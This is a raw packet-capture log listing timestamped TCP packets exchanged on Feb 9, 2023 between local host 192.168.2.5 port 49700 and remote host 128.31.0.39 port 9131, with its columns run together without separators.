                      Feb 9, 2023 00:59:58.426000118 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426049948 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426060915 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426089048 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426126003 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426127911 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426165104 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426204920 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426214933 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426260948 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426304102 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426307917 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426337957 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426378965 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426382065 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426430941 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426482916 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426486015 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426548004 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426575899 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426600933 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426609039 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426646948 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426677942 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426753044 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426808119 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426817894 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426872969 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.426913977 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.426939964 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427001953 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427045107 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427069902 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427125931 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427176952 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427197933 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427225113 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427252054 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427270889 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427275896 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427318096 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427320004 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427354097 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427377939 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427403927 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427407026 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427459955 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427460909 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427508116 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427546978 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427553892 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427586079 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427613974 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427630901 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427655935 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427696943 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427731991 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427794933 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427828074 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427841902 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427860022 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.427901983 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.427989006 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428021908 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428066015 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428086996 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428116083 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428143978 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428158998 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428173065 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428237915 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428272009 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428333044 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428376913 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428386927 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428415060 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428442955 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428488016 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428489923 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428524971 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428539991 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428565979 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428603888 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428631067 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428651094 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428690910 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428703070 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428716898 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428744078 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428766012 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428781033 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428828955 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.428854942 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428915024 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428947926 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.428977013 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429006100 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429052114 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429052114 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429126978 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429153919 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429167986 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429181099 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429208040 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429228067 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429236889 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429261923 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429289103 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429291010 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429320097 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429330111 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429368973 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429395914 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429424047 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429424047 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429451942 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429461956 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429480076 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429507971 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429519892 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429533005 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429559946 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429579020 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429585934 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429611921 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429632902 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429637909 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429665089 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429691076 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429712057 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429718971 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429744959 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429745913 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429770947 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429786921 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429800987 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429827929 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429846048 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429856062 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429884911 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429897070 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429913998 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429940939 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429954052 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.429969072 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.429995060 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430010080 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430022955 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430051088 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430068970 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430079937 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430107117 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430120945 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430133104 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430160046 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430183887 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430191040 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430212021 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430238962 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430243969 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430269003 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430284023 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430296898 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430326939 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430346012 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430356026 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430383921 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430394888 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430408955 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430438995 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430449009 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430464983 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430490971 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430505991 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430520058 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430548906 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430574894 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430588961 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430625916 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430752039 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430778980 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430804968 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430818081 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430831909 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430860043 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430869102 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430888891 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430916071 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430943012 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430953026 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430970907 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.430984020 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.430998087 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431024075 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431050062 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431058884 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431077003 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431103945 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431104898 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431121111 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431140900 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431162119 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431168079 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431189060 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431194067 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431217909 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431229115 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431242943 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431256056 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431273937 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431284904 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431296110 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431324005 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431348085 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431349993 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431365967 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431376934 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431389093 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431404114 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431411028 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431431055 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431438923 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431458950 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431466103 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431484938 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431495905 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431513071 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.431521893 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.431550980 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.444727898 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.497874975 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.497957945 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.497956038 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498037100 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498051882 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498086929 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498100042 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498114109 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498127937 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498148918 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498152018 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498189926 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498224974 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498254061 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498271942 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498286963 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498315096 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498322964 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498367071 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498393059 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498395920 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498423100 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498423100 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498449087 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498456001 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498475075 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498481035 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498534918 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498534918 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498570919 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498603106 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498617887 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498629093 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498648882 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498655081 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498672962 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498681068 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498712063 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498723030 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498729944 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498754025 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498780012 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498783112 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498806000 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498826027 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498830080 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498869896 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498869896 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498873949 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498893023 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498898983 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498925924 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498925924 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498945951 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498950958 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498971939 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.498975039 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.498987913 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499010086 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499036074 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499037027 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499054909 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499063015 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499088049 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499097109 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499113083 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499115944 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499133110 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499140024 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499152899 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499165058 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499191046 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499202967 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499217033 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499219894 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499245882 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499258041 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499272108 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499275923 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499291897 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499298096 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499316931 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499326944 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499351025 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499352932 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.499388933 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.499388933 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.531932116 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.531968117 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.532047987 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.532128096 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.533629894 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533693075 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533739090 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533781052 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533781052 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.533781052 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.533812046 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533858061 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.533859015 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533858061 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.533890963 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533920050 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.533920050 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.533924103 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.533960104 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.534019947 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.599924088 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600049019 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.600056887 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600114107 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600126982 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.600179911 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.600187063 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600392103 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.600440979 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600513935 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600584984 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600589037 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.600631952 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600666046 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600682974 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.600701094 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600737095 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600756884 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.600786924 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.600857973 CET497009131192.168.2.5128.31.0.39
